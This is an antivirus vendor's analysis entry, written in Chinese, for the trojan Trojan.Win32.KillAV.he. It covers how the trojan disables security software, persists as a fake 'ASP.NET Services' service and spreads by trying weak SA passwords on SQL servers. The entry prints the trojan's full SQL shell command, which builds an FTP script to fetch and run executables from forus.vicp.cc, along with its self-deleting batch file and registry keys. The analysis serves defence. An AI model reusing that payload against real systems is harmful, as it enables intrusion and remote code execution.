病毒名称

Trojan.Win32.KillAV.he

捕获时间

2007-01-21

病毒症状

    该程序是一个用DELPHI编写的木马程序，并用UPX加壳来躲避杀毒软件查杀，加壳后长度为59,904 字节，图标为windows安装文件图标，病毒扩展名为exe，传播途径主要为释放木马，网络传播．

病毒分析

    当病毒被执行后，将自身移动到系统根目录下并改名为NTDUBECT.EXE；修改系统时间，使大部分杀毒软件过期失效；遍历系统进程，将大部分杀毒软件进程终止，以达到突破杀毒软件的目的。利用命令行net stop关闭Windows安全中心、Windows防火墙及系统还原；在%USERPROFILE%\Local Settings\Temp 文件夹下生成文件conime.exe并运行。
Conime.exe执行后在%SystemRoot%下新建目录“zh-CHS”，并在该目录下释放文件smss.exe； 并直接在%SystemRoot%下释放文件delbat.bat、ntsvc.ocx。调用SCM写注册表将病毒程序smss.exe注册成名为ASP.NET Services的服务,通过使用StartServiceA函数启动被注册的服务；调用regsvr32.exe将ntsvc.ocx控件注册，作为病毒辅助文件使用；delbat.bat用来删除临时文件夹下的conime.exe。
当计算机与网络连通后smss.exe会在 %SystemRoot%\zh-CHS 目录下释放文件csrss.exe，该文件执行后会尝试扫描本机所处于网段中的所有IP地址，对所有开启SQL服务的计算机，尝试用SQL管理员SA及弱口令进行连接，若连接成功，则在该机器上执行SQL命令从“forus.vicp.cc”上下载病毒木马。Smss.exe使用勾子对病毒另一进程csrss.exe循环检测运行状态，若csrss.exe被停止，则立即执行csrss.exe。

感染对象

Windows 2000/Windows XP/Windows 2003

传播途径

文件捆绑，网络传播

技术细节

病毒执行的SQL命令为：

select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c net stop sharedaccess&echo open forus.vicp.cc>2nd.sys&echo sys>>2nd.sys&echo 2008>>2nd.sys&echo get new.exe>>2nd.sys&echo get me.exe>>2nd.sys&echo bye>>2nd.sys&echo ftp -s:2nd.sys>xinbat.bat&echo start new.exe>>xinbat.bat&echo start me.exe>>xinbat.bat&echo start new.exe>>xinbat.bat&echo start me.exe>>xinbat.bat&echo del 2nd.sys>>xinbat.bat&echo del%0>>xinbat.bat&xinbat.bat" )')

Delbat.bat文件内容为：

ping -n 1 127.0.0.1>nul
del C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\conime.exe
del %0
exit

病毒新建的注册表项：

项：HKEY_CLASSES_ROOT\CLSID\{E7BC34A3-BA86-11CF-84B1-CBC2DA68BF6C}\InprocServer32
键值：@
指向文件：C:\WINNT\system32\ntsvc.ocx

项：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspnet_stata
键值：Start（服务启动方式）
数值数据：00000002

键值：ImagePath（服务映像路径）
数值数据：C:\windows\system32\zh-CHS\smss.exe

键值：DisplayName（服务显示名称）
数值数据：ASP.NET Services

键值：ObjectName（服务对象名称）
数值数据：LocalSystem